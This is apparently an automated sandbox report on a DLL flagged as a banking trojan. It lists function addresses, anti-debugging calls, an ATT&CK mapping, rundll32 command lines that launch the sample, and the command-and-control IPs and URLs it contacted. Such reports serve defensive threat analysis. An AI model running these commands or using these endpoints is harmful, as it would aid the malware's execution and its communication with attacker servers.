                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3826B0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E381EB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E37AE80
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E378EF0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E37B6F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3862F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E37F6E0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E366AD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3796D0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E383EC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E38FA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E381730
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E389B10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E383B00
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E37BF50
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E37E3F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3783C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E377FC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E387FC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E37D030
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E381020
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E385CB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E37E0A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E384CA0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3850A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E38DCA0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E375CAC
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E36ACD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E37A0D0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3798DA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3788C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E378CC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E361570
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E377564
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E36F9A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E37C590
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E37D980
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E38D180
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3889F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3871F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E37FDD0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E3AE210
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3722A0 NtDelayExecution,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E38BE30 NtClose,
                      Source: SecuriteInfo.com.Variant.Razy.980776.31954.dllReversingLabs: Detection: 27%
                      Source: SecuriteInfo.com.Variant.Razy.980776.31954.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.31954.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.31954.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.31954.dll,Bluewing
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.31954.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.31954.dll,Earth
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.31954.dll,Masterjust
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.31954.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.31954.dll,Bluewing
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.31954.dll,Earth
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.31954.dll,Masterjust
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.31954.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                      Source: classification engineClassification label: mal84.bank.troj.evad.winDLL@11/2@0/5
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.31954.dll,Bluewing
                      Source: SecuriteInfo.com.Variant.Razy.980776.31954.24049Joe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: SecuriteInfo.com.Variant.Razy.980776.31954.dllStatic file information: File size 1375232 > 1048576
                      Source: SecuriteInfo.com.Variant.Razy.980776.31954.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: SecuriteInfo.com.Variant.Razy.980776.31954.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb source: loaddll32.exe, 00000000.00000002.1189544778.000000006E427000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1192090011.000000006E427000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.31954.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                      Source: C:\Windows\System32\loaddll32.exeCode function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E373930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E38CEF8 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E3D97B0 IsDebuggerPresent,IsDebuggerPresent,CreateThread,std::_Timevec::_Timevec,WaitForSingleObjectEx,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E3D8B60 __invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__cftoe,__aligned_msize,__invoke_watson_if_error,GetFileType,WriteConsoleW,GetLastError,__cftoe,WriteFile,WriteFile,OutputDebugStringW,__invoke_watson_if_error,__CrtDbgReportWV,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E3D47C0 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4ABA72 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4AB64D push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4AB942 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E376C50 KiUserExceptionDispatcher,LdrLoadDll,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E377A60 RtlAddVectoredExceptionHandler,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E3A63A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.77.0.96 235
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.56.219.47 180
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.46.210.220 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 143.244.140.214 40
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.31954.dll',#1
                      Source: loaddll32.exe, 00000000.00000002.1188419560.0000000001790000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1190007023.0000000003230000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: loaddll32.exe, 00000000.00000002.1188419560.0000000001790000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1190007023.0000000003230000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.1188419560.0000000001790000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1190007023.0000000003230000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.1188419560.0000000001790000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1190007023.0000000003230000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetACP,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E372980 GetUserNameW,

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection112Process Injection112OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRundll321LSASS MemorySecurity Software Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol13Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Network Configuration Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemFile and Directory Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Information Discovery23Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      SecuriteInfo.com.Variant.Razy.980776.31954.dll6%VirustotalBrowse
                      SecuriteInfo.com.Variant.Razy.980776.31954.dll27%ReversingLabsWin32.Worm.Cridex

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://192.46.210.220/563209-4053062332-10020%Avira URL Cloudsafe
                      https://45.77.0.96:6891/0%URL Reputationsafe
                      https://45.77.0.96:60%Avira URL Cloudsafe
                      https://192.46.210.220/graphy0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/80%Avira URL Cloudsafe
                      https://45.77.0.96:6891/derpd0%Avira URL Cloudsafe
                      https://192.46.210.220/563209-450%Avira URL Cloudsafe
                      https://192.46.210.220/0%URL Reputationsafe
                      https://185.56.219.47:8116/0%URL Reputationsafe
                      https://192.46.210.220/Certification0%URL Reputationsafe
                      https://192.46.210.220/7.0.96:6891/0%Avira URL Cloudsafe
                      https://192.46.210.220/7.0.96:6891/Microsoft0%Avira URL Cloudsafe
                      https://142.46.210.220/0%Avira URL Cloudsafe
                      https://192.46.210.220/nd0%Avira URL Cloudsafe
                      https://45.77.0.96/0%URL Reputationsafe
                      https://18192.46.210.220/H0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/x0%Avira URL Cloudsafe
                      https://192.46.210.220/GlobalSign0%URL Reputationsafe
                      https://45.77.0.96:6891/Microsoft0%URL Reputationsafe
                      https://185.56.219.47:8116/H0%Avira URL Cloudsafe
                      https://192.46.210.220/.0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://192.46.210.220/true
                      • URL Reputation: safe
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://192.46.210.220/563209-4053062332-1002rundll32.exe, 00000003.00000002.1187731513.00000000005AC000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/rundll32.exe, 00000003.00000003.1142934817.00000000005C4000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://45.77.0.96:6loaddll32.exe, 00000000.00000003.872455871.0000000000FF4000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/graphyrundll32.exe, 00000003.00000002.1187731513.00000000005AC000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47:8116/8rundll32.exe, 00000003.00000003.1142934817.00000000005C4000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/derpdrundll32.exe, 00000003.00000003.859025204.00000000005C5000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/563209-45rundll32.exe, 00000003.00000002.1187731513.00000000005AC000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47:8116/rundll32.exe, 00000003.00000003.1013667932.00000000005C4000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://192.46.210.220/Certificationrundll32.exe, 00000003.00000002.1187731513.00000000005AC000.00000004.00000020.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://192.46.210.220/7.0.96:6891/rundll32.exe, 00000003.00000002.1187731513.00000000005AC000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/7.0.96:6891/Microsoftrundll32.exe, 00000003.00000002.1187731513.00000000005AC000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://142.46.210.220/loaddll32.exe, 00000000.00000003.1061650734.0000000000FF5000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/ndrundll32.exe, 00000003.00000003.995243252.00000000005C4000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96/rundll32.exe, 00000003.00000002.1191016182.0000000004871000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://18192.46.210.220/Hloaddll32.exe, 00000000.00000003.1034567517.0000000000FF5000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      https://45.77.0.96:6891/xrundll32.exe, 00000003.00000003.859025204.00000000005C5000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/GlobalSignrundll32.exe, 00000003.00000002.1187731513.00000000005AC000.00000004.00000020.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://45.77.0.96:6891/Microsoftrundll32.exe, 00000003.00000002.1187731513.00000000005AC000.00000004.00000020.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://185.56.219.47:8116/Hrundll32.exe, 00000003.00000003.1142934817.00000000005C4000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/.rundll32.exe, 00000003.00000002.1187731513.00000000005AC000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown

                      Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public

                      IPDomainCountryFlagASNASN NameMalicious
                      45.77.0.96
                      unknownUnited States
                      20473AS-CHOOPAUStrue
                      185.56.219.47
                      unknownItaly
                      202675KELIWEBITtrue
                      192.46.210.220
                      unknownUnited States
                      5501FRAUNHOFER-CLUSTER-BWResearchInstitutesspreadalloverGetrue
                      143.244.140.214
                      unknownUnited States
                      174COGENT-174UStrue

                      Private

                      IP
                      192.168.2.1

                      General Information

                      Joe Sandbox Version:33.0.0 White Diamond
                      Analysis ID:510691
                      Start date:28.10.2021
                      Start time:04:59:45
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 10m 37s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:SecuriteInfo.com.Variant.Razy.980776.31954.24049 (renamed file extension from 24049 to dll)
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:22
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal84.bank.troj.evad.winDLL@11/2@0/5
                      EGA Information:Failed
                      HDC Information:
                      • Successful, ratio: 14.1% (good quality ratio 14.1%)
                      • Quality average: 79.4%
                      • Quality standard deviation: 15.6%
                      HCA Information:
                      • Successful, ratio: 65%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32
                      Warnings:
                      Show All
                      • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                      • TCP Packets have been reduced to 100
                      • Excluded IPs from analysis (whitelisted): 20.50.102.62, 23.211.6.115, 173.222.108.226, 173.222.108.210, 23.203.70.208, 20.73.194.208, 209.197.3.8, 20.82.210.154, 80.67.82.235, 80.67.82.211, 20.54.110.249, 40.112.88.60
                      • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, e12564.dspb.akamaiedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                      • Report size getting too big, too many NtEnumerateKey calls found.
                      • Report size getting too big, too many NtEnumerateValueKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      05:01:46API Interceptor172x Sleep call for process: rundll32.exe modified
                      05:01:50API Interceptor170x Sleep call for process: loaddll32.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      45.77.0.96SecuriteInfo.com.Variant.Razy.980776.8232.dllGet hashmaliciousBrowse
                        SecuriteInfo.com.Variant.Razy.980776.30568.dllGet hashmaliciousBrowse
                          SecuriteInfo.com.Variant.Razy.980776.9478.dllGet hashmaliciousBrowse
                            SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                              SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                  SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                    SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                      SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                        SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                          SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                            SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                              SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                  SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                    SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                      SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                        SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                          SecuriteInfo.com.Variant.Razy.980776.28360.dllGet hashmaliciousBrowse
                                                            SecuriteInfo.com.Variant.Razy.980776.19796.dllGet hashmaliciousBrowse
                                                              185.56.219.47SecuriteInfo.com.Variant.Razy.980776.10558.dllGet hashmaliciousBrowse
                                                                SecuriteInfo.com.Variant.Razy.980776.8232.dllGet hashmaliciousBrowse
                                                                  SecuriteInfo.com.Variant.Razy.980776.30568.dllGet hashmaliciousBrowse
                                                                    SecuriteInfo.com.Variant.Razy.980776.9478.dllGet hashmaliciousBrowse
                                                                      SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                                                        SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                                                          SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                            SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                              SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                  SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                    SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                      SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                        SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
